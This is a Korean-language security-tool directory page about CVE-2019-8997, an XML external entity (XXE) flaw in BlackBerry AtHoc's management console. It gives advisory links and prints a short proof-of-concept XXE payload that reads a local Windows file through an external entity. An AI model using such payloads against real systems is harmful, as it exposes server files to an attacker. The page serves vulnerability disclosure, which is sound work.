Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2019-8997 — An XML External Entity Injection (XXE) vulnerability in the Management System (console) of BlackBerry AtHoc versions earlier than 7.6 HF-567 could allow an attacker to potentially read arbitrary local files from the application server or make requests on the network by entering maliciously crafted XML in an existing field. | Kitploit
도구/GitHubGitHub/nxkennedy/cve-2019-8997
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubnxkennedy/cve-2019-8997

CVE-2019-8997

저장소 보기
226년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →

소개

An XML External Entity Injection (XXE) vulnerability in the Management System (console) of BlackBerry AtHoc versions earlier than 7.6 HF-567 could allow an attacker to potentially read arbitrary local files from the application server or make requests on the network by entering maliciously crafted XML in an existing field.

공유

CVE-2019-8997

BlackBerry AtHoc의 Management System(콘솔)에서 버전 7.6 HF-567 이전에 존재하는 XML 외부 엔터티 주입(XXE) 취약점으로 인해, 공격자가 기존 필드에 악의적으로 조작된 XML을 입력하여 애플리케이션 서버의 임의 로컬 파일을 읽거나 네트워크 요청을 보낼 수 있습니다.

보고자

Nolan B. Kennedy (nxkennedy)

보안 권고

http://support.blackberry.com/kb/articleDetail?articleNumber=000047227
https://nvd.nist.gov/vuln/detail/CVE-2019-8997

블로그 게시물

https://www.nolanbkennedy.com/feed/xxe-vulnerability-blackberry-athoc
https://www.mindpointgroup.com/blog/pen-test/xxe-vulnerability-in-blackberry-athoc-networked-crisis-communication-platform/

개념 증명 익스플로잇

root@kitploit:~
<!DOCTYPE doc [
<!ELEMENT doc ANY > 
<!ENTITY foo SYSTEM "file:///c:/windows/win.ini">
]>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0">
<xsl:output method="html" />
<xsl:template match="/">

<doc>&foo;</doc>

<head></head>
<body style="margin: 0; padding: 0;" oncontextmenu="return
false;"></body>
</xsl:template>
</xsl:stylesheet>
도구 다운로드